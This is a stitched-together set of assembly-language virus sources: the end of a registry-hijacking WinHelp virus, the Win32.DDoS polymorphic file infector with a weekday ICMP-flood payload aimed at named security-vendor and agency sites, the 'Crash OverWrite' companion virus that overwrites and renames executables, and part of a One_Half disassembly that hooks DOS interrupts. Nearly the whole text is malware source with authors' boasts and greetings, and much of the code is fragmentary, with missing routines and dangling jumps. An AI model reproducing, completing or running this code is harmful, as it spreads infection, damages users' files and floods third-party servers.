cmp byte ptr [di],"1" ; is it the %1, like it has to be?
JNE exit_payload ; if not, something is wrong
cmp byte ptr [di-2],'"' ; is there the quotes sign?
JNE dont_skip_quotes
dec di ; if yes, skip it
dont_skip_quotes:
dec di ; go to the start of the first
; parameter in the commandline, the
; name of the .GIF file
pop ds ; restore DS
restore_gif_commandline:
push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
cld ; clear direction flag
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
add di,ax
mov cx,ax ; CX=length of string
mov al," " ; search for the blank
std ; set direction flag
repne scasb ; search for the end of the filename
JNZ exit_payload ; if not found, exit
add di,2 ; go to 1st param (file to display)
cmp byte ptr [di],"C" ; is there "C:\TENTACLE.GIF"
JNE exit_payload ; if not, there's nothing to restore
cmp dword ptr [di+1],"ET\:" ; make really sure
JNE exit_payload
mov byte ptr [di],"%" ; restore the correct cmdline "%1"
mov word ptr [di+1],"1"
CALL call_RegSetValue ; set it.
exit_payload:
add sp,size payload_stack_frame ; free room on stack
pop bp ; restore BP (main stack frame ptr)
pop es ; restore ES
RET
call_RegQueryValue:
;* push dword ptr 1 ; HKEY_CURRENT_USER
db 66h,68h,1,0,0,0 ; fixup - byte match
RET
call_RegSetValue:
;* push dword ptr 1 ; HKEY_CURRENT_USER
db 66h,68h,1,0,0,0 ; fixup - byte match
RET
; ----- PATCH WINHELP -------------------------------------------------------
patch_winhelp:
cmp word ptr [bp.rw_buffer+1Ch],2 ; number of segments
JB exit_patch_winhelp ; it's not the WINHELP.EXE
; we know, don't patch it
exit_patch_winhelp:
RET
RegQueryValue dd 0000FFFFh
RegSetValue dd 0000FFFFh
org_entry dd 0000FFFFh
virus_end:
; Most data of the virus is stored in a buffer on the stack. The following
; structure represents the lay-out of this stack frame:
stack_frame struc
dta db 2Bh dup(?)
tmp_buffer db 10 dup(?)
bytes_to_copy dd ?
full_filename db 24 dup(?)
full_filespec db 24 dup(?)
tmp_filename db 16 dup(?)
source_handle dw ?
dest_handle dw ?
file_date dw ?
file_time dw ?
file_size dd ?
new_header_offs dd ?
end_of_NE_hdr dd ?
alignment_unit dd ?
first_segm_offs dd ?
new_sect_descr dw 4 dup(?)
rw_buffer db 64 dup(?)
dw ?
our_reloc_offs dd ?
module_ordinal dd ?
new_entry_CS dw ?
new_entry_IP dw ?
stack_frame ends
; The data that is used in the EPO engine of the virus uses another stack
; frame that is represented in this structure:
EPO_stack_frame struc
entry_CS_offset dw ?
entry_CS_phys dw ?
entry_CS_flags dw ?
entry_CS_virt dw ?
reloc_type dw ?
reloc_offs dw ?
reloc_what dd ?
module_index dw ?
API_ordinal dw ?
entry_CS_relocs dd ?
relocs_number dw ?
EPO_stack_frame ends
payload_stack_frame struc
reg_buffer1 db 40h dup(?)
reg_buffer2 db 40h dup(?)
size_reg_buffer dd ?
payload_stack_frame ends
first_gen_entry:
push ds ; save DS
pusha ; save all registers
push ss ; DS=SS
pop ds
mov bx,0FFFFh
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect all EXE files in current dir
mov ah,9
mov dx,offset first_gen_message
int 21h
mov ax,4C00h
int 21h
end first_gen_entry
;
; ***************************************************************************
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
; ***************************************************************************
;
;
;
; Please note that it is illegal to spread viruses, so if you compile this
; code, just test it on a closed system and don't place it in the wild !
; I am not responsible for your actions .. as always ;)
;
;
;
;
; This is the first Windows Virus I've written so far, and some parts are from
; Win32.Aztec by Billy Beleceb, because at the time i wrote this thing, not everything
; was clear in my mind, as it is now, hope I can present you some better things from me
; in the future.
;
; This is also my first polymorphic virus ever ;) so don't expect too much from the
; poly engine. I did not understand much of the code from other poly engines, but
; now, after coding one on my own, I do, so I maybe can code a better one the next time ;)
;
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
; and try to keep track that they don't look completely useless.
; I also use several ways to decrypt the virus ( xor, neg, not .. ) and
; several methods to do the loop. The size will always be in ECX and
; the start in ESI, but i use several methods to put the values inside
; the registers so there is nothing static.
; The only static thing left is the call to the polymorphic decryptor ;(
;
;
; I was just able to test this thing on a Win95 PC, so I don't know if it will
; work on other systems, but I think it will. Two friends made some tests under
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
;
;
; It tries to get the 4 following API's:
;
; - Kernel32.dll <- the only one we really need to work, the others are for fun
;
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
; - Advapi32.dll <- get some data from the registry
; - Winsck32.dll <- Payload : Ping-flood a server
;
;
;
;
; What does this Virus do :
;
; - 1.st Generation infects just the current directory ( easier to infect just some files
*eg* )
; - Get's API's with LoadLibraryA & GetProcAddress
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function
; - Infects the current, the windows and the system directory and parses some
; random directory's on drive C:
; - Follows LNK - Files ( does not work with NT / 2k )
; - Removes and restores File-Attributes
; - Parses Drive C:, enters a folder with a chance of 1 to 3
; - Retrieves the Startmenue from registry and parses it ( follows LNK-Files there )
; - If everything runs well it will infect 100 files all over the disk
; - Generates a polymorph decryptor which will be used for all files infected in one run
; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )
; - Does not infect files smaller than 40 kb
; - Will not infect files with AV, AN or DR in the filename
; - Payload is a icmp flood on one of these servers :
;
; Sunday = www.bundesnachrichtendienst.de
; Monday = French Secret Service ( dgse.citeweb.net )
; Tuesday = www.avp.com ( AV )
; Wednesday = www.lockdown2000.com
; Thursday = www.f-secure.com
; Friday = www.norton.com
; Saturday = www.zonelabs.com
;
; *# Please note that i choose these servers because I think they can #*
; *# handle such an attack, if any idiot would release this into the wild. #*
;
;
;
;
;
;
; To make this code working use TASM 5.0 and pewrsec.
;
;
;
;
;
;
; Thanks and greetz fly to these people:
;
; Billy Beleceb - Your Win32 VWG is just great ..
; ( you'll find some of your code [Win32.Aztec] here ;)
; Evul - Thanks for hosting my site at coderz.net
; Ciatrix - Hope you carry on your good work with VDAT !
; SnakeMan - Hope you get more entrys *g* --> http://altavirus.cjb.net
; PhilippP - Thanks for the thrilling test in 2k .. ;)
; BumbleBee - Still thinking of Sex ?
; diediedie - Thnx for demotivating me... :)
; asmodeus - nice beginner lesson in poly ;)
; darkman - just believe me: the question was stupid ;)
;
;
;
;
;
; ***************************************************************************
; ---------------------------[ Here we start ]-------------------------------
; ***************************************************************************
.586p
.model flat
jumps ; Jumps get calculated
; ( I know not good for optimizing.. )
.radix 16 ; All numbers are Hexadecimal
; I once searched for a forgotten 'h'
; 2 weeks until I found this bug.. :P
; some API's
extrn ExitProcess:PROC ; fake host for 1. Generation
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
.code
; ***************************************************************************
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
; ***************************************************************************
Virus: ; Here we go
Delta:
mov ebp, offset Delta ; I want to do this a bit different
neg ebp ; than usual, who knows, maybe this
pop eax ; fools some bad heuristics
add ebp, eax
; save esp
mov dword ptr [ebp+XESP], esp
mov esi, [esp] ; let's get the return address of the Create Process API
xor si, si ; round it to a full page
; ***************************************************************************
; -------------------------[ let's get the API's ]---------------------------
; ***************************************************************************
xchg eax, ecx ; If we didn't get this API or the other one, we quit !
jecxz ExecuteHost ; thnx to Billy ;)
IMAGEHLP db 'Imagehlp',0 ; this dll is not nessecairily needed, but dll's will
; only get infected, if we are able to use the CheckSumMappedFile
; Function from this dll to create a checksum
; it is delivered with win9x, NT and several compilers.
WSOCK db 'wsock32.dll',0
; we need this one here to perform a ping
; ( not needed for the virus, but the payload )
; ***************************************************************************
; ------------------[ Outbreak ! Here we start infecting ]-------------------
; ***************************************************************************
; ***************************************************************************
; -----------------------[ Parse Directory's ]-------------------------------
; ***************************************************************************
InitParsing:
InfectWinDirAgain:
mov [ebp+InfCounter], 20d
call ParseFolder ; let's parse the startmenue and follow all
; LNK-Files inside ;)
ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0
jbe EndParsing ; we infected enough ? ok, leave !
GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one
push 03h
pop ecx
call GetRand
NoThisOne:
call FindNextFileProc
jmp ParseFolder
; ***************************************************************************
; -----------------[ Let's get the Startmenue folder ]-----------------------
; ***************************************************************************
NoStartMenue:
ret
; Misc Data .. ;)
Folders db '*.',0 ; search for directory's
RootDir db 'C:\',0 ; we want to start parsing at root of Drive C:
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'SetFileAttributesA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetWindowsDirectoryA', 0
db 'GetSystemDirectoryA', 0
db 'GetCurrentDirectoryA', 0
db 'SetCurrentDirectoryA', 0
db 'GetFileAttributesA', 0
db 'GetTickCount', 0
db 'CreateThread',0
db 'GetSystemTime',0
ImageHLPNames:
db 'CheckSumMappedFile', 0h
ADVAPI32Names:
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0
WSOCK32Names:
db 'socket',0
db 'WSACleanup',0
db 'WSAStartup',0
db 'closesocket',0
db 'sendto',0
db 'setsockopt',0
; ***************************************************************************
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
; ***************************************************************************
GotZero:
inc esi
pop ecx ; get ecx ( counter )
EndApi3:
ret
; ***************************************************************************
; --------------[ Search Kernel Export Table for API's ]---------------------
; ***************************************************************************
mov esi, [ebp+NTableVA] ; Get the Name Pointer Table Addy in esi
SearchNextApi1:
push esi ; Save Pointer Table
lodsd
add eax, [ebp+MZAddy] ; make it VA
FoundApi1:
pop esi ; clear stack ( we don't want buffer overflows
; ok, we want them, but not here *bg* )
NotFoundApi1:
xor eax, eax ; We didn't find the API we need :(
ret ; We set EAX to 0 to show we have to
; return to the host..
; ***************************************************************************
; -------------------[ Execute the original Program ]------------------------
; ***************************************************************************
add eax,12345678h
org $-4
retBas dd 0h
jmp eax
FirstGenHost:
push 0h ; Stop executing this stuff ( first Generation
call ExitProcess ; only )
; ***************************************************************************
; ----------------[ We try to find the Kernel Address ]----------------------
; ***************************************************************************
GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; Did we pass our limit of 50 pages ?
GK2:
sub esi, 10000h ; Get the next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; Check it
CheckDLL:
add edi, 16h ; check for the Dll-Flag
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
jne GK2 ; if it is no dll go on searching
K32Trys db 5h ; Search-Range
; ***************************************************************************
; -----------------[ Infection of the current directory ]--------------------
; ***************************************************************************
inc eax
jz EndInfectCurDir1 ; If there are no files, we return
dec eax
InfectCurDirFile:
; filename in esi
lea esi, [ebp+WFD_szFileName]
call InfectFile ; Try to infect it !
call FindNextFileProc
filemask db '*.*', 0 ; we search for all files, not just exe files
; ***************************************************************************
; ---------------------[ Prepare infection of file ]------------------------
; ***************************************************************************
InfectFile: ; Here we prepare to infect the file
; the filename is in [ebp+WFD_szFileName]
; we open it and check if it is something
; we are able to infect...
; esi points to the filename..
; Get File-Attributes
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XGetFileAttributesA]
; save them
mov dword ptr [ebp+Attributes], eax
inc eax
jz NoInfection ; if we failed we don't infect
dec eax
call InfectLNK
Notagoodfile:
call UnMapFile ; we store the file..
; we restore the file-attributes
NoInfection:
ret
; ***************************************************************************
; ------------------------[ Open and close Files ]---------------------------
; ***************************************************************************
OpenFile:
inc eax
jz Closed ; if there is an error we don't infect the file
dec eax ; now the handle is in eax
; we save it
mov dword ptr [ebp+FileHandle],eax
CreateMap:
push ecx ; save the size
call UnMapFile2
Closed:
stc ; set carriage flag
ret
ret
; ***************************************************************************
; -------------------------[ Infect an EXE-FILE ]----------------------------
; ***************************************************************************
call Align
pop edx
push 10d
pop ecx
call GetRand ; get random number ( we'll use the EAX value )
pop edi ; restore and xchange
pop edx
@Xor:
lodsb
xor al, dl
stosb
loop @Xor
jmp EndPolyCrypto
NegEncrypt:
dec edx
jnz NotEncrypt
@Neg:
lodsb
neg al
stosb
loop @Neg
jmp End2LCrypto
NotEncrypt: ; not byte ptr [esi]
dec edx
jnz IncEncrypt
@Not:
lodsb
not al
stosb
loop @Not
jmp End2LCrypto
End2LCrypto:
NoCRC:
ret
NoEXE: ; let's return and close the infected file
; this will also write it to disk !
stc
ret
; ***************************************************************************
; ------------------------[ Infect an LNK-FILE ]-----------------------------
; ***************************************************************************
LNKSearch: ; go on searching
dec esi
loop CheckLoop
; if we end here, we did not find the two dots.. :(
NoLNK:
ret
PointsDetected2:
dec esi
cmp byte ptr [esi], 0h
je NameDetected
pop esi
call FindFirstFileProc
inc eax
jz RestoreLNK ; If there are no files, we return
dec eax
; otherwise we save the handle
RestoreLNK:
lea edi, [ebp+WIN32_FIND_DATA]
lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA
mov ecx, 337d ; and some other data
rep movsb
; ***************************************************************************
; ---------------------[ The evil Part: the Payload ]------------------------
; ***************************************************************************
; ***************************************************************************
; -------------------------[ Align-Procedure ]-------------------------------
; ***************************************************************************
; lets align the size..
; eax - size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - new size
ret
; ***************************************************************************
; --------------------------[ FindFile Procedures ]--------------------------
; ***************************************************************************
FindFirstFileProc:
lea eax, [ebp+WIN32_FIND_DATA]
push eax
push esi
call dword ptr [ebp+XFindFirstFileA]
mov dword ptr [ebp+FindHandle], eax
ret
FindNextFileProc:
lea edi, [ebp+WFD_szFileName]
mov ecx, 276d ; we clear these fields !
xor eax, eax
rep stosb
CheckFileName:
pushad
lea esi, [ebp+WFD_szFileName]
mov edi, esi
mov ecx, 260d
EndConvert:
lea edi, [ebp+WFD_szFileName]
lea esi, [ebp+FileNames]
mov ecx, 3h
FileNameCheck: ; check for av-names
push ecx ; i don't want to infect them
mov ecx, 260d
CheckON:
lodsb
repnz scasb
or ecx, ecx
jnz AVFile
pop ecx
inc esi
loop FileNameCheck
jmp EndFileNameCheck
AVFile:
mov al, byte ptr [esi] ; check if the second char also matches
cmp byte ptr [edi], al
je GotAVFile
dec esi
jmp CheckON
GotAVFile:
pop ecx ; clear stack
popad
stc ; set carriage flag
ret
EndFileNameCheck:
popad
clc
ret
;****************************************************************************
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
; ***************************************************************************
; we check here for PE and MZ signs
; to identify the Executable we want to infect
; I do this a little bit different than usual *g*
CheckPESign:
cmp dword ptr [edi], 'FP' ; check if greater or equal to PF
jae NoPESign
NoPESign:
stc ; set carriage flag
ret
CheckMZSign:
cmp word ptr [esi], '[M'
jae NoPESign
clc
ret
ret
; ***************************************************************************
; ----------------[ Generate a pesudo-random Number ]------------------------
; ***************************************************************************
GetRand:
; generate a pseudo-random NR.
; based on some initial registers
push ecx ; and the Windows - Ontime
add ecx, eax
call dword ptr [ebp+XGetTickCount]
add eax, ecx
add eax, ecx
add eax, edx
add eax, edi
add eax, ebp
add eax, dword ptr [ebp+PolyLen]
add eax, dword ptr [ebp+LoopLen]
pop ecx
add eax, ecx
or eax, eax
jne GetOutRand
mov eax, 87654321h
inc eax
GetOutRand:
xor edx, edx ; clean edx ( needed to be able to divide later )
div ecx ; Random Numer is in EAX
; RND No. 'till ECX in EDX
ret
; ***************************************************************************
; ----------------------[ Generate a Poly Decryptor ]------------------------
; ***************************************************************************
genPoly:
and dword ptr [ebp+PolyLen], 0h
push 10h
pop ecx
call GetRand ; get a random number to start
; and save it as the new key used for all files
call RandJunk
; we have 3 different ways to put
; the size in ecx and 3 different ways
; to get the starting offset in esi
push 2h ; divide by 2
pop ecx
call GetRand ; get a random number to decide what we do
; first
; we need these 2 values before we start the
; decryption loop !
; lenght of loop = 0
and dword ptr [ebp+LoopLen], 0
; now we choose the way we crypt this thing !
push 5h
pop ecx
call GetRand
mov dword ptr [ebp+CryptType], edx
jmp EndPolyCrypto
IncESI1:
dec edx
jnz IncESI2
jmp EndIncESI
jmp EndIncESI2
EndIncESI2:
add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h
EndIncESI:
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h
call StoreLoopLen
jmp EndLoopType
jmp EndLoopType
LoopType3:
mov eax, 0F98349h ; dec ecx cmp ecx, 0h
stosd
add dword ptr [ebp+LoopLen], 4h
mov al, 75h ; jne
stosb
add dword ptr [ebp+PolyLen], 3h
call StoreLoopLen
EndLoopType:
add dword ptr [ebp+PolyLen], 2h
mov eax, VirusSize ; calculate the new size for the virus
add eax, dword ptr [ebp+PolyLen]
mov dword ptr [ebp+VirLen], eax
ret
StoreLoopLen:
xor eax, eax ; calculate the size for the loop
mov ax, 100h
sub eax, dword ptr [ebp+LoopLen]
sub eax, 2h
stosb
ret
; ***************************************************************************
; --------------------------[ Insert Junk Code ]----------------------------
; ***************************************************************************
RandJunk: ; edi points to the place where they will be stored
; we will insert 1-8 junk instructions
push 7d ; each time this routine is called
pop ecx
call GetRand
xchg ecx, edx
inc ecx
push ecx
RandJunkLoop:
push ecx
push 8h
pop ecx
call GetRand ; get a random number from 0 to 7
xchg eax, edx
ret
OpcodeTable:
db 08Bh ; mov
db 033h ; xor
db 00Bh ; or
db 02Bh ; sub
db 003h ; add
db 023h ; and
db 013h ; adc
db 01Bh ; sbb
popad
ret
; ***************************************************************************
; -------------------------[ Get esi from stack ]----------------------------
; ***************************************************************************
GenerateESI:
; the first thing we do is to get the
; start of the crypted code, this is simpel,
; it is our return address, so we get it from
; stack
; there are 3 different ways we can do this
push 3h
pop ecx
call GetRand
dec edx ; which way to we use ?
jnz ESI2
ESI1:
lea esi, [ebp+movESI] ; use the mov esi, [esp] instruction
movsw ; 3 bytes long
movsb
add dword ptr [ebp+PolyLen], 3h
ESI3:
push 5h
pop ecx
call GetRand
xchg eax, edx
cmp al, 1h ; if we got ecx, we use eax
jne ESI3b
xor eax, eax
ESI3b:
mov edx, eax
push edx ; save edx
add eax, 58h ; pop a register
stosb
EndESI:
ret
; ***************************************************************************
; --------------------------[ Move the size to ECX ]-------------------------
; ***************************************************************************
push 3h
pop ecx
call GetRand ; random Nr in edx
inc edx ; increase
jmp EndECX
jmp EndECX
ECX3:
push -1
pop ecx
call GetRand
mov eax, VirusSize
shl edx, 26d
shr edx, 26d
sub eax, edx
stosb
call StoShrEAX
add dword ptr [ebp+PolyLen], 11d
; ***************************************************************************
; -------------------[ Data which does not travel ]--------------------------
; ***************************************************************************
VirusEnd: ; ok, this data will travel, but will be generated
; new on each run
Reg1 db (?) ; here we save the registers we use for the junk
Reg2 db (?) ; code
XCheckSumMappedFile dd (?)
XRegOpenKeyExA dd (?)
XRegQueryValueExA dd (?)
XRegCloseKey dd (?)
Xsocket dd (?)
XWSACleanup dd (?)
XWSAStartup dd (?)
Xclosesocket dd (?)
Xsendto dd (?)
Xsetsockopt dd (?)
; Directory's
windir db 7Fh dup (0) ; here we save the directory's
curdir db 7Fh dup (0) ; we want to infect
EndBufferData:
; ***************************************************************************
; ------------------------[ That's all folks ]-------------------------------
; ***************************************************************************
end Virus
; comment *
;
; Name: Crash OverWrite :-)
; Coder: BeLiAL
;
; This is my first win32 virus.Its only a
; companionvirus but it does his work very
; well.Its perhaps coded a bit lame but
; im sure nobody will care.It infects the
; first file in the directory and renames
; the victimfile to .dat .I perhaps i
; make it resident or infecting more file...
; Greetings and thanx go out
; to Evul,Toro,Padisah and Wallo.
;
; BeLiAL
;*
.386
.model flat
Locals
Jumps
.data
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
dd 0
db '[Crash OverWrite] coded by BeLiAL'
.code
start:
push offset FindFileData
push offset exefile
call FindFirstFileA
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je reanimate
mov eax,offset cFileName.FindFileData
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je reanimate
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess
ends
end start
; Virus One_Half
; Disassembly done by Ratter
; To Vyvojar: If ya're still living, could ya pls lemme know about it?
; I would be very happy if i could speak with you sometimes ...
; To otherz who are reading this: Pls lemme know if there's any bug in the code.
; Or just to say ya like this :)
; You can reach me on Undernet channel #virus, #3c or via email: ratter@atlas.cz
; Compile:
; tasm /t/m2 one_half.asm
; tlink /t one_half.obj
.486p
.487
org 100h
;
loc_0582:
;
p label near
p_ equ offset the_second_part - offset boot_start
p__ equ presun_rutiny + (p - buffer)
;
_mcb_ db 'Z' ; it'z last_block
dw 9F01h ; PSP
dw 0FFh ; 4096 bytez
db 3 dup(?) ; reserved
db 'COMMAND', 0 ; blockz_owner_name ...
;
exe_header dw 20CDh ; exe_signature
part_pag dw 501eh
page_cnt dw 09b4h
relo_cnt dw 0
hdr_size dw 21cdh
min_mem dw 1f58h
max_mem dw 0bac3h
relo_ss dw 03d0h
exe_sp dw 0efe8h
exe_flag db 00h ; checksum
db 0b4h
exe_ip dw 0100h
relo_cs dw 0FFF0h
tabl_off dw 0BA05h
;
decode_routine_table:
dw 0208h ; here'z the table
dw 0381h ; of offsetz, where are
dw 047ch ; the chunkz of code of
dw 01f5h ; decode_routine
dw 049bh
xor_offset dw 01b1h
dw 0168h
dw 056ch
dw 0539h
jnz_offset dw 0182h
;
beginning_ofs dw 07beh
;
overwritten_bytez:
db 06h, 83h, 05h, 00h, 00h, 2Eh
db 8Ch, 0Eh, 85h, 05h, 4Fh, 02h
db 00h, 2Eh,0A1h,0A3h, 05h, 26h
db 0C7h
db 'G.com <jmen'
db 0Bh, 26h, 3Ah, 47h, 21h,0BAh
db 4Ah, 05h, 0Fh
db '„_driveru>', 0Ah, 't'
db 0FFh,0C6h, 44h,0FFh, 00h,0B8h
db 03h, 4Bh,0BBh, 80h, 00h, 8Ah
db 0Ch, 0Ah,0C9h,0BAh, 68h, 04h
db 0Fh
db 'ys ...', 0Ah, 0Dh, '$'
db 17h
db 'instalovan'
db 02h,0EBh, 03h,0E9h, 43h, 02h
db 4Eh, 56h, 89h, 36h
;
;
hdr_size_ dw 10h
date_div dw 1Eh
page_size_ dw 200h
;
new_int_1ch:
push ax
push ds
push es
xor ax, ax
mov ds, ax
les ax, dword ptr ds:[21h * 4] ; gimme int_21h
mov cs:[old_int_21h - p__], ax ; store offset
mov ax, es ; gimme seg
cmp ax, 800h ; are we under 800h ?
ja short loc_0783
mov word ptr cs:[old_int_21h - p__ + 2], ax ; yope
; we've got dos_int_21h_seg
les ax, dword ptr cs:[old_int_1ch - p]; gimme old_int_1ch
mov ds:[1ch * 4], ax ; restore it back
mov word ptr ds:[1ch * 4 + 2], es
mov word ptr ds:[21h * 4], offset new_int_21h - p;and set up
mov word ptr ds:[21h * 4 + 2], cs ; my new_int_21h
loc_0783: ; nope
pop es
pop ds ; restore regz
pop ax ; and
db 0EAh ; jmp far ptr old_int_1ch
old_int_1ch dw 0FF53h, 0F000h
one_half endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz movez some routinez ...
sub_078B proc near
mov si, offset presun_rutiny - p
mov di, offset buffer - p
mov cx, offset f_read_ - offset presun_rutiny - 4
cld
rep movsb
retn
sub_078B endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz makez from cyl_number_in_si valid cx_reg
sub_0798 proc near
push ax
mov ax, si
mov ch, al
push cx
mov cl, 4
shl ah, cl
pop cx
mov al, 3Fh ; '?'
and dh, al
and cl, al
not al
push ax
and ah, al
or dh, ah
pop ax
shl ah, 1
shl ah, 1
and ah, al
or cl, ah
pop ax
retn
sub_0798 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz writez text if run_counter is even and it iz even day etc.
sub_07EC proc near
mov ah, 4 ; gimme CMOS date_&_time
int 1Ah
jc short loc_ret_0816
test dl, 3 ; day even etc. ?
jnz short loc_ret_0816
test word ptr ds:[run_counter - p], 1; run_counter is even
jnz short loc_ret_0816
mov cx, offset sub_07ec - offset text_; gimme text_length
mov si, offset text_ - p ; gimme text_offset
mov ah, 0Fh ; gimme cur_video_page_number
int 10h ; why ?
mov bl, 7
mov ah, 0Eh ; print char 2 cur_page ...
locloop_080D:
lodsb ; gimme byte
int 10h
loop locloop_080D ; and go on
loc_ret_0816:
retn ; and end ...
sub_07EC endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz callz int_21h_file_fc with a handle in bx
sub_0817 proc near
push bx
db 0bbh ; mov bx, ?
handle_ dw 0 ; gimme handle
int 21h ; call int_21h
pop bx
retn ; and end ...
sub_0817 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
